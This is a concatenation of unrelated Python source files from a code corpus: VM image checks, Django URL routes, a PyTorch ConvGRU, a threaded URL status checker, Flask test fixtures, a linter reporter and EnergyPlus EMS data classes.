The predefined data and prerequisits for this type of image.
Returns
-------
bool: True on success, False otherwise.
str: Eventual message on success or failure.
"""
_logger.debug('__ Image support.')
supp = True
prerequisites = image_defs['prereq']
msg = ''
if self.vmdkdesc_dict['createType'] \
in prerequisites['vmdk_supported_types']:
msg += 'Type is %s, OK.\n' % self.vmdkdesc_dict['createType']
else:
msg += 'Type %s is not supported.\n' % \
self.vmdkdesc_dict['createType']
supp = False
sizes = self.image_size()
if sizes['logical'] > prerequisites['MAX_IMG_SIZE_GB']:
msg += 'Size of the image %.2f GB exceeds the maximum allowed ' \
'size of %.2f GB.\n' % \
(sizes['logical'], prerequisites['MAX_IMG_SIZE_GB'])
supp = False
else:
msg += 'Image size of %.2f GB below maximum allowed size ' \
'of %.2f GB, OK.\n' % \
(sizes['logical'], prerequisites['MAX_IMG_SIZE_GB'])
return supp, msg
def image_data(self):
"""
Collect data about contents of the image file.
Returns
-------
bool: True on success, False otherwise;
dict: The image data.
"""
_logger.debug('Image data: %s', self._fn)
#
# initialise the dictionary for the image data
self.image_info['img_name'] = self._fn
self.image_info['img_type'] = 'VMDK'
self.image_info['img_header'] = self.img_header
self.image_info['img_size'] = self.image_size()
#
# mount the image using the nbd
try:
result = self.handle_image()
except Exception as e:
_logger.critical(' Error %s', str(e))
raise OciMigrateException('Failed') from e
return result, self.image_info
def type_specific_prereq_test(self):
"""
Verify the prerequisites specific for the image type from the header.
Returns
-------
bool: True or False.
str : Message
"""
_logger.debug('__ Specific prerequisites.')
prereqs = format_data['4b444d56']['prereq']
failmsg = ''
#
# size
passed_requirement = True
if self.image_info['img_size']['logical'] > prereqs['MAX_IMG_SIZE_GB']:
_logger.critical(' Image size %8.2f GB exceeds maximum allowed %8.2f GB',
prereqs['MAX_IMG_SIZE_GB'], self.image_info['img_size']['logical'])
failmsg += '\n Image size %8.2f GB exceeds maximum allowed ' \
'%8.2f GB' % (prereqs['MAX_IMG_SIZE_GB'],
self.image_info['img_size']['logical'])
passed_requirement = False
else:
failmsg += '\n Image size %8.2f GB meets maximum allowed size ' \
'of %8.2f GB' % (self.image_info['img_size']['logical'],
prereqs['MAX_IMG_SIZE_GB'])
#
# type
if self.img_header['desc']['createType'] \
not in prereqs['vmdk_supported_types']:
_logger.critical(' Image type %s is not in the supported type list: %s',
self.img_header['desc']['createType'], prereqs['vmdk_supported_types'])
failmsg += '\n Image type %s is not in the supported type list: %s' \
% (self.img_header['desc']['createType'], prereqs['vmdk_supported_types'])
passed_requirement = False
else:
failmsg += '\n Image type %s is in the supported type list: %s' \
% (self.img_header['desc']['createType'], prereqs['vmdk_supported_types'])
#
# Warning, for now, streamOptimized format will probably cause problems.
if self.img_header['desc']['createType'] == 'streamOptimized':
_ = read_yn(' %s\n Continue' % self.streamoptimized_msg, yn=False, suppose_yes=migrate_data.yes_flag)
return passed_requirement, failmsg
| StarcoderdataPython |
3378276 | <filename>pagetags/urls.py
# -*- coding: utf-8 -*-
"""
URL dispatcher config for Pagetags Django CMS plugin.
"""
from django.conf.urls import patterns, include, url
from pagetags import views
urlpatterns = patterns('',
url(r'^$', views.list_tags),
)
| StarcoderdataPython |
1711878 | <gh_stars>100-1000
import torch
import torch.nn as nn
class ConvGRU(nn.Module):
def __init__(self, h_planes=128, i_planes=128):
super(ConvGRU, self).__init__()
self.do_checkpoint = False
self.convz = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convr = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.convq = nn.Conv2d(h_planes+i_planes, h_planes, 3, padding=1)
self.w = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convz_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convr_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
self.convq_glo = nn.Conv2d(h_planes, h_planes, 1, padding=0)
def forward(self, net, *inputs):
inp = torch.cat(inputs, dim=1)
net_inp = torch.cat([net, inp], dim=1)
b, c, h, w = net.shape
glo = torch.sigmoid(self.w(net)) * net
glo = glo.view(b, c, h*w).mean(-1).view(b, c, 1, 1)
z = torch.sigmoid(self.convz(net_inp) + self.convz_glo(glo))
r = torch.sigmoid(self.convr(net_inp) + self.convr_glo(glo))
q = torch.tanh(self.convq(torch.cat([r*net, inp], dim=1)) + self.convq_glo(glo))
net = (1-z) * net + z * q
return net
| StarcoderdataPython |
43726 | # -*- coding: utf-8 -*-
"""
An example url status checker implementation consumes urls from a queue.
"""
import threading
import queue
import requests
class StatusChecker(threading.Thread):
"""
The thread that will check HTTP statuses.
"""
#: The queue of urls
url_queue = None
#: The queue our results will go into
result_queue = None
def __init__(self, url_queue, result_queue):
super().__init__()
self.url_queue = url_queue
self.result_queue = result_queue
def run(self):
while True:
try:
# this will throw queue.Empty immediately if there's
# no tasks left
to_check = self.url_queue.get_nowait()
except queue.Empty:
break # empty queue, we're done!
else:
resp = requests.get(to_check)
self.result_queue.put((to_check, resp.status_code,))
self.url_queue.task_done() # the the queue we're done
if __name__ == '__main__':
urls = (
'http://httpbin.org/status/418',
'http://httpbin.org/status/200',
'http://httpbin.org/status/404',
'http://httpbin.org/status/500',
)
url_queue = queue.Queue()
for url in urls:
url_queue.put(url)
result_queue = queue.Queue()
num_workers = 2
for i in range(num_workers):
t = StatusChecker(url_queue, result_queue)
print('Starting worker {}'.format(i))
t.start()
# wait for the queue to empty
url_queue.join()
while not result_queue.empty():
url, status = result_queue.get_nowait()
print('{} - {}'.format(url, status))
| StarcoderdataPython |
3253918 | <filename>microcosm_flask/tests/conventions/fixtures.py
"""
Testing fixtures (e.g. for CRUD).
"""
from copy import copy
from enum import Enum, unique
from uuid import uuid4
from marshmallow import Schema, fields
from microcosm_flask.decorators.schemas import SelectedField, add_associated_schema
from microcosm_flask.fields import EnumField
from microcosm_flask.linking import Link, Links
from microcosm_flask.namespaces import Namespace
from microcosm_flask.operations import Operation
@unique
class EyeColor(Enum):
"""
Natural eye colors
"""
PURPLE = "PURPLE"
TEAL = "TEAL"
RUBY = "RUBY"
class Address:
def __init__(self, id, person_id, address_line):
self.id = id
self.person_id = person_id
self.address_line = address_line
class Person:
def __init__(self, id, first_name, last_name):
self.id = id
self.first_name = first_name
self.last_name = last_name
class NewAddressSchema(Schema):
addressLine = fields.String(attribute="address_line", required=True)
class NewPersonSchema(Schema):
# both attribute and data_key fields should result in the same swagger definition
firstName = fields.String(attribute="first_name", required=True)
last_name = fields.String(data_key="lastName", required=True)
eye_color = EnumField(EyeColor, data_key="eyeColor")
email = fields.Email()
@property
def csv_column_order(self):
return ["firstName", "lastName"]
class NewPersonBatchSchema(Schema):
items = fields.List(fields.Nested(NewPersonSchema))
class UpdatePersonSchema(Schema):
firstName = fields.String(attribute="first_name")
last_name = fields.String(data_key="lastName")
class AddressCSVSchema(NewAddressSchema):
# Same as AddressSchema, without the added links
id = fields.UUID(required=True)
class AddressSchema(AddressCSVSchema):
_links = fields.Method("get_links", dump_only=True)
def get_links(self, obj):
links = Links()
links["self"] = Link.for_(
Operation.Retrieve,
Namespace(subject=Address),
address_id=obj.id,
)
return links.to_dict()
class DeleteAddressSchema(Schema):
address_clock = fields.Int(required=True)
class PersonCSVSchema(NewPersonSchema):
# PersonSchema without the links
id = fields.UUID(required=True)
@property
def csv_column_order(self):
column_order = ["id"]
column_order .extend([field for field in super(PersonCSVSchema, self).csv_column_order])
return column_order
class RecursiveSchema(Schema):
children = fields.List(fields.Nested(lambda: RecursiveSchema()))
def pubsub_schema(fields):
"""
Example usage of `add_associated_schema`, creating an additional decorator
that adds syntactic sugar and makes the intent clear
"""
return add_associated_schema("PubsubMessage", fields)
@pubsub_schema([
"email",
"firstName",
])
# Other example not using the shorthand
@add_associated_schema(
"Foo",
[
SelectedField("email", required=True),
SelectedField("firstName", required=False)
]
)
class PersonSchema(PersonCSVSchema):
_links = fields.Method("get_links", dump_only=True)
def get_links(self, obj):
links = Links()
links["self"] = Link.for_(
Operation.Retrieve,
Namespace(subject=Person),
person_id=obj.id,
)
return links.to_dict()
class PersonLookupSchema(Schema):
family_member = fields.Boolean(required=False)
class PersonBatchSchema(NewPersonSchema):
items = fields.List(fields.Nested(PersonSchema))
ADDRESS_ID_1 = uuid4()
PERSON_ID_1 = uuid4()
PERSON_ID_2 = uuid4()
PERSON_ID_3 = uuid4()
PERSON_1 = Person(PERSON_ID_1, "Alice", "Smith")
PERSON_2 = Person(PERSON_ID_2, "Bob", "Jones")
PERSON_3 = Person(PERSON_ID_3, "Charlie", "Smith")
ADDRESS_1 = Address(ADDRESS_ID_1, PERSON_ID_1, "21 Acme St., San Francisco CA 94110")
def address_retrieve(id, address_id):
return ADDRESS_1
def address_delete(address_id, address_clock):
return address_id == ADDRESS_ID_1
def address_search(offset, limit, list_param=None, enum_param=None):
if list_param is None or enum_param is None:
return [ADDRESS_1], 1
return [
Address(
ADDRESS_ID_1,
PERSON_ID_1,
",".join(list_param) + str(len(list_param)) + enum_param.value
),
], 1
def person_create(**kwargs):
return Person(id=PERSON_ID_2, **kwargs)
def person_search(offset, limit):
return [PERSON_1], 1
def person_update_batch(items):
return dict(
items=[
person_create(**item)
for item in items
]
)
def person_retrieve(person_id, family_member=None):
if family_member:
return PERSON_3
elif person_id == PERSON_ID_1:
return PERSON_1
else:
return None
def person_delete(person_id):
return person_id == PERSON_ID_1
def person_delete_batch():
return True
def person_replace(person_id, **kwargs):
return Person(id=person_id, **kwargs)
def person_update(person_id, **kwargs):
if person_id == PERSON_ID_1:
# Copy to avoid changing attr of constant
person_1_copy = copy(PERSON_1)
for key, value in kwargs.items():
setattr(person_1_copy, key, value)
return person_1_copy
else:
return None
| StarcoderdataPython |
3372271 | <reponame>imfiver/Sec-Tools
from django.contrib import admin
from django.urls import path
from . import views
from dirscan import views, search2, target
urlpatterns = [
path('dir-result/', views.dirresult, name="dir-result"),
path('dir-search/', search2.search_post, name="dir-search"),
path('get-target/', target.get_target, name="get-target")
]
| StarcoderdataPython |
3265367 | # coding=utf-8
"""
Provides an implementation of a reporting mode for human readers.
"""
import os
from comply.rules.rule import RuleViolation
from comply.reporting.base import Reporter
from comply.printing import printout, Colors
class HumanReporter(Reporter):
""" Provides reporting output (including suggestions) formatted for human readers. """
def report(self, violations: list, path: str):
# determine absolute path of file
absolute_path = os.path.abspath(path)
# group violations by reason so that we can suppress similar ones
grouped = self.group_by_reason(violations)
num_reported_results = 0
for reason, violations in grouped.items():
results = []
for violation in violations:
result = self.formatted_result(violation, reason, absolute_path)
results.append(result)
num_reported_results += self.report_results(results, prefix_if_suppressed='\n')
if self.is_verbose and num_reported_results > 0:
# make sure we separate the "Checking..." message with a newline
# note that this only occur when --verbose is set
printout('')
def formatted_result(self, violation: RuleViolation, reason: str, path: str) -> str:
""" Return a formatted result of a rule violation. """
rule = violation.which
rule.augment(violation)
location = Colors.DARK + '{0}:'.format(path) + Colors.RESET
severity = RuleViolation.report_severity_as(rule.severity, self.is_strict)
severity_color = (Colors.DENY if severity > RuleViolation.WARN else
(Colors.WARN if severity > RuleViolation.ALLOW else
Colors.ALLOW))
if reason is None or len(reason) == 0:
reason = ('Severe violation' if severity > RuleViolation.WARN else
('Cautioned violation' if severity > RuleViolation.ALLOW else
'Allowed violation'))
why = '{tint}{0} {vague}[{1}]'.format(reason, rule.name,
tint=severity_color,
vague=Colors.VAGUE) + Colors.RESET
solution = rule.solution(violation)
output = '{reason} in\n{location}'.format(
reason=why, location=location)
if len(violation.lines) > 0:
context = '\n'
for i, (linenumber, line) in enumerate(violation.lines):
# a "line" can, in some cases, actually span several lines
# (typically rules that match functions with parameters spanning several lines,
# so the entire function signature is considered "the line")
expanded_lines = HumanReporter.expand_line(linenumber, line)
for j, (n, l) in enumerate(expanded_lines):
if n is None:
n = ''
line = l.expandtabs(4)
lineno = str(n)
pad = ' '
context += Colors.EMPHASIS + lineno + Colors.RESET
context += Colors.RESET + '{0}{1}'.format(
('\t' + pad) if len(lineno) < 4 else pad, line) # assumes lineno < 9999
if j != len(expanded_lines) - 1:
context += '\n'
if i != len(violation.lines) - 1:
context += '\n'
output += context
if solution is not None and len(solution) > 0:
output += '\n{strong}{suggestion}'.format(
suggestion=solution, strong=Colors.STRONG)
return '\n' + output + Colors.RESET
@staticmethod
def expand_line(line_number: int, line: str):
""" Like str.splitlines() except including line numbers. """
if len(line) == 0:
return [(line_number, line)]
lines = []
for i, l in enumerate(line.splitlines()):
lines.append(
(line_number + i if line_number is not None else None, l)
)
return lines
| StarcoderdataPython |
1799951 | """ Data objects in group "Energy Management System"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class EnergyManagementSystemSensor(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:Sensor`
Declares EMS variable as a sensor
a list of output variables and meters that can be reported are available after a run on
the report (.rdd) or meter dictionary file (.mdd) if the Output:VariableDictionary
has been requested.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'output:variable or output:meter index key name',
{'name': u'Output:Variable or Output:Meter Index Key Name',
'pyname': u'outputvariable_or_outputmeter_index_key_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'output:variable or output:meter name',
{'name': u'Output:Variable or Output:Meter Name',
'pyname': u'outputvariable_or_outputmeter_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'external-list'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 3,
'name': u'EnergyManagementSystem:Sensor',
'pyname': u'EnergyManagementSystemSensor',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| This name becomes a variable for use in Erl programs
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def outputvariable_or_outputmeter_index_key_name(self):
"""field `Output:Variable or Output:Meter Index Key Name`
Args:
value (str): value for IDD Field `Output:Variable or Output:Meter Index Key Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outputvariable_or_outputmeter_index_key_name` or None if not set
"""
return self["Output:Variable or Output:Meter Index Key Name"]
@outputvariable_or_outputmeter_index_key_name.setter
def outputvariable_or_outputmeter_index_key_name(self, value=None):
""" Corresponds to IDD field `Output:Variable or Output:Meter Index Key Name`
"""
self["Output:Variable or Output:Meter Index Key Name"] = value
@property
def outputvariable_or_outputmeter_name(self):
"""field `Output:Variable or Output:Meter Name`
Args:
value (str): value for IDD Field `Output:Variable or Output:Meter Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outputvariable_or_outputmeter_name` or None if not set
"""
return self["Output:Variable or Output:Meter Name"]
@outputvariable_or_outputmeter_name.setter
def outputvariable_or_outputmeter_name(self, value=None):
""" Corresponds to IDD field `Output:Variable or Output:Meter Name`
"""
self["Output:Variable or Output:Meter Name"] = value
class EnergyManagementSystemActuator(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:Actuator`
Hardware portion of EMS used to set up actuators in the model
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'actuated component unique name',
{'name': u'Actuated Component Unique Name',
'pyname': u'actuated_component_unique_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'actuated component type',
{'name': u'Actuated Component Type',
'pyname': u'actuated_component_type',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'actuated component control type',
{'name': u'Actuated Component Control Type',
'pyname': u'actuated_component_control_type',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 4,
'name': u'EnergyManagementSystem:Actuator',
'pyname': u'EnergyManagementSystemActuator',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| This name becomes a variable for use in Erl programs
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def actuated_component_unique_name(self):
"""field `Actuated Component Unique Name`
Args:
value (str): value for IDD Field `Actuated Component Unique Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `actuated_component_unique_name` or None if not set
"""
return self["Actuated Component Unique Name"]
@actuated_component_unique_name.setter
def actuated_component_unique_name(self, value=None):
"""Corresponds to IDD field `Actuated Component Unique Name`"""
self["Actuated Component Unique Name"] = value
@property
def actuated_component_type(self):
"""field `Actuated Component Type`
Args:
value (str): value for IDD Field `Actuated Component Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `actuated_component_type` or None if not set
"""
return self["Actuated Component Type"]
@actuated_component_type.setter
def actuated_component_type(self, value=None):
"""Corresponds to IDD field `Actuated Component Type`"""
self["Actuated Component Type"] = value
@property
def actuated_component_control_type(self):
"""field `Actuated Component Control Type`
Args:
value (str): value for IDD Field `Actuated Component Control Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `actuated_component_control_type` or None if not set
"""
return self["Actuated Component Control Type"]
@actuated_component_control_type.setter
def actuated_component_control_type(self, value=None):
"""Corresponds to IDD field `Actuated Component Control Type`"""
self["Actuated Component Control Type"] = value
class EnergyManagementSystemProgramCallingManager(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:ProgramCallingManager`
Input EMS program. a program needs a name
a description of when it should be called
and then lines of program code for EMS Runtime language
"""
_schema = {'extensible-fields': OrderedDict([(u'program name 1',
{'name': u'Program Name 1',
'pyname': u'program_name_1',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'energyplus model calling point',
{'name': u'EnergyPlus Model Calling Point',
'pyname': u'energyplus_model_calling_point',
'required-field': False,
'autosizable': False,
'accepted-values': [u'BeginNewEnvironment',
u'AfterNewEnvironmentWarmUpIsComplete',
u'BeginTimestepBeforePredictor',
u'AfterPredictorBeforeHVACManagers',
u'AfterPredictorAfterHVACManagers',
u'InsideHVACSystemIterationLoop',
u'EndOfZoneTimestepBeforeZoneReporting',
u'EndOfZoneTimestepAfterZoneReporting',
u'EndOfSystemTimestepBeforeHVACReporting',
u'EndOfSystemTimestepAfterHVACReporting',
u'EndOfZoneSizing',
u'EndOfSystemSizing',
u'AfterComponentInputReadIn',
u'UserDefinedComponentModel',
u'UnitarySystemSizing'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 3,
'name': u'EnergyManagementSystem:ProgramCallingManager',
'pyname': u'EnergyManagementSystemProgramCallingManager',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| no spaces allowed in name
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def energyplus_model_calling_point(self):
"""field `EnergyPlus Model Calling Point`
Args:
value (str): value for IDD Field `EnergyPlus Model Calling Point`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `energyplus_model_calling_point` or None if not set
"""
return self["EnergyPlus Model Calling Point"]
@energyplus_model_calling_point.setter
def energyplus_model_calling_point(self, value=None):
"""Corresponds to IDD field `EnergyPlus Model Calling Point`"""
self["EnergyPlus Model Calling Point"] = value
def add_extensible(self,
program_name_1=None,
):
"""Add values for extensible fields.
Args:
program_name_1 (str): value for IDD Field `Program Name 1`
if `value` is None it will not be checked against the
specification and is assumed to be a missing value
"""
vals = []
program_name_1 = self.check_value("Program Name 1", program_name_1)
vals.append(program_name_1)
self._extdata.append(vals)
@property
def extensibles(self):
"""Get list of all extensibles."""
return self._extdata
@extensibles.setter
def extensibles(self, extensibles):
"""Replaces extensible fields with `extensibles`
Args:
extensibles (list): nested list of extensible values
"""
self._extdata = []
for ext in extensibles:
self.add_extensible(*ext)
class EnergyManagementSystemOutputVariable(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:OutputVariable`
This object sets up an EnergyPlus output variable from an Erl variable
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'ems variable name',
{'name': u'EMS Variable Name',
'pyname': u'ems_variable_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'type of data in variable',
{'name': u'Type of Data in Variable',
'pyname': u'type_of_data_in_variable',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Averaged',
u'Summed'],
'autocalculatable': False,
'type': 'alpha'}),
(u'update frequency',
{'name': u'Update Frequency',
'pyname': u'update_frequency',
'required-field': True,
'autosizable': False,
'accepted-values': [u'ZoneTimestep',
u'SystemTimestep'],
'autocalculatable': False,
'type': 'alpha'}),
(u'ems program or subroutine name',
{'name': u'EMS Program or Subroutine Name',
'pyname': u'ems_program_or_subroutine_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'units',
{'name': u'Units',
'pyname': u'units',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 4,
'name': u'EnergyManagementSystem:OutputVariable',
'pyname': u'EnergyManagementSystemOutputVariable',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def ems_variable_name(self):
"""field `EMS Variable Name`
| must be an acceptable EMS variable
Args:
value (str): value for IDD Field `EMS Variable Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `ems_variable_name` or None if not set
"""
return self["EMS Variable Name"]
@ems_variable_name.setter
def ems_variable_name(self, value=None):
"""Corresponds to IDD field `EMS Variable Name`"""
self["EMS Variable Name"] = value
@property
def type_of_data_in_variable(self):
"""field `Type of Data in Variable`
Args:
value (str): value for IDD Field `Type of Data in Variable`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `type_of_data_in_variable` or None if not set
"""
return self["Type of Data in Variable"]
@type_of_data_in_variable.setter
def type_of_data_in_variable(self, value=None):
"""Corresponds to IDD field `Type of Data in Variable`"""
self["Type of Data in Variable"] = value
@property
def update_frequency(self):
"""field `Update Frequency`
Args:
value (str): value for IDD Field `Update Frequency`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `update_frequency` or None if not set
"""
return self["Update Frequency"]
@update_frequency.setter
def update_frequency(self, value=None):
"""Corresponds to IDD field `Update Frequency`"""
self["Update Frequency"] = value
@property
def ems_program_or_subroutine_name(self):
"""field `EMS Program or Subroutine Name`
| optional for global scope variables, required for local scope variables
Args:
value (str): value for IDD Field `EMS Program or Subroutine Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `ems_program_or_subroutine_name` or None if not set
"""
return self["EMS Program or Subroutine Name"]
@ems_program_or_subroutine_name.setter
def ems_program_or_subroutine_name(self, value=None):
"""Corresponds to IDD field `EMS Program or Subroutine Name`"""
self["EMS Program or Subroutine Name"] = value
@property
def units(self):
"""field `Units`
| optional but will result in dimensionless units for blank
| EnergyPlus units are standard SI units
Args:
value (str): value for IDD Field `Units`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `units` or None if not set
"""
return self["Units"]
@units.setter
def units(self, value=None):
"""Corresponds to IDD field `Units`"""
self["Units"] = value
class EnergyManagementSystemMeteredOutputVariable(DataObject):
""" Corresponds to IDD object `EnergyManagementSystem:MeteredOutputVariable`
This object sets up an EnergyPlus output variable from an Erl variable
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'ems variable name',
{'name': u'EMS Variable Name',
'pyname': u'ems_variable_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'update frequency',
{'name': u'Update Frequency',
'pyname': u'update_frequency',
'required-field': True,
'autosizable': False,
'accepted-values': [u'ZoneTimestep',
u'SystemTimestep'],
'autocalculatable': False,
'type': 'alpha'}),
(u'ems program or subroutine name',
{'name': u'EMS Program or Subroutine Name',
'pyname': u'ems_program_or_subroutine_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'resource type',
{'name': u'Resource Type',
'pyname': u'resource_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Electricity',
u'NaturalGas',
u'Gasoline',
u'Diesel',
u'Coal',
u'FuelOil#1',
u'FuelOil#2',
u'Propane',
u'OtherFuel1',
u'OtherFuel2',
u'WaterUse',
u'OnSiteWaterProduced',
u'MainsWaterSupply',
u'RainWaterCollected',
u'WellWaterDrawn',
u'CondensateWaterCollected',
u'EnergyTransfer',
u'Steam',
u'DistrictCooling',
u'DistrictHeating',
u'ElectricityProducedOnSite',
u'SolarWaterHeating',
u'SolarAirHeating'],
'autocalculatable': False,
'type': 'alpha'}),
(u'group type',
{'name': u'Group Type',
'pyname': u'group_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Building',
u'HVAC',
u'Plant',
u'System'],
'autocalculatable': False,
'type': 'alpha'}),
(u'end-use category',
{'name': u'End-Use Category',
'pyname': u'enduse_category',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Heating',
u'Cooling',
u'InteriorLights',
u'ExteriorLights',
u'InteriorEquipment',
u'ExteriorEquipment',
u'Fans',
u'Pumps',
u'HeatRejection',
u'Humidifier',
u'HeatRecovery',
u'WaterSystems',
u'Refrigeration',
u'OnSiteGeneration',
u'HeatingCoils',
u'CoolingCoils',
u'Chillers',
u'Boilers',
u'Baseboard',
u'HeatRecoveryForCooling',
u'HeatRecoveryForHeating'],
'autocalculatable': False,
'type': 'alpha'}),
(u'end-use subcategory',
{'name': u'End-Use Subcategory',
'pyname': u'enduse_subcategory',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'units',
{'name': u'Units',
'pyname': u'units',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Energy Management System',
'min-fields': 7,
'name': u'EnergyManagementSystem:MeteredOutputVariable',
'pyname': u'EnergyManagementSystemMeteredOutputVariable',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def ems_variable_name(self):
"""field `EMS Variable Name`
| must be an acceptable EMS variable, no spaces
Args:
value (str): value for IDD Field `EMS Variable Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `ems_variable_name` or None if not set
"""
return self["EMS Variable Name"]
@ems_variable_name.setter
def ems_variable_name(self, value=None):
"""Corresponds to IDD field `EMS Variable Name`"""
self["EMS Variable Name"] = value
@property
def update_frequency(self):
"""field `Update Frequency`
Args:
value (str): value for IDD Field `Update Frequency`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `update_frequency` or None if not set
"""
return self["Update Frequency"]
@update_frequency.setter
def update_frequency(self, value=None):
"""Corresponds to IDD field `Update Frequency`"""
self["Update Frequency"] = value
@property
def ems_program_or_subroutine_name(self):
"""field `EMS Program or Subroutine Name`
| optional for global scope variables, required for local scope variables
Args:
value (str): value for IDD Field `EMS Program or Subroutine Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `ems_program_or_subroutine_name` or None if not set
"""
return self["EMS Program or Subroutine Name"]
@ems_program_or_subroutine_name.setter
def ems_program_or_subroutine_name(self, value=None):
"""Corresponds to IDD field `EMS Program or Subroutine Name`"""
self["EMS Program or Subroutine Name"] = value
@property
def resource_type(self):
"""field `Resource Type`
| choose the type of fuel, water, electricity, pollution or heat rate that should be metered.
Args:
value (str): value for IDD Field `Resource Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `resource_type` or None if not set
"""
return self["Resource Type"]
@resource_type.setter
def resource_type(self, value=None):
"""Corresponds to IDD field `Resource Type`"""
self["Resource Type"] = value
@property
def group_type(self):
"""field `Group Type`
| choose a general classification, building (internal services), HVAC (air systems), or plant (hydronic systems), or system
Args:
value (str): value for IDD Field `Group Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `group_type` or None if not set
"""
return self["Group Type"]
@group_type.setter
def group_type(self, value=None):
"""Corresponds to IDD field `Group Type`"""
self["Group Type"] = value
@property
def enduse_category(self):
"""field `End-Use Category`
| choose how the metered output should be classified for end-use category
Args:
value (str): value for IDD Field `End-Use Category`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `enduse_category` or None if not set
"""
return self["End-Use Category"]
@enduse_category.setter
def enduse_category(self, value=None):
""" Corresponds to IDD field `End-Use Category`
"""
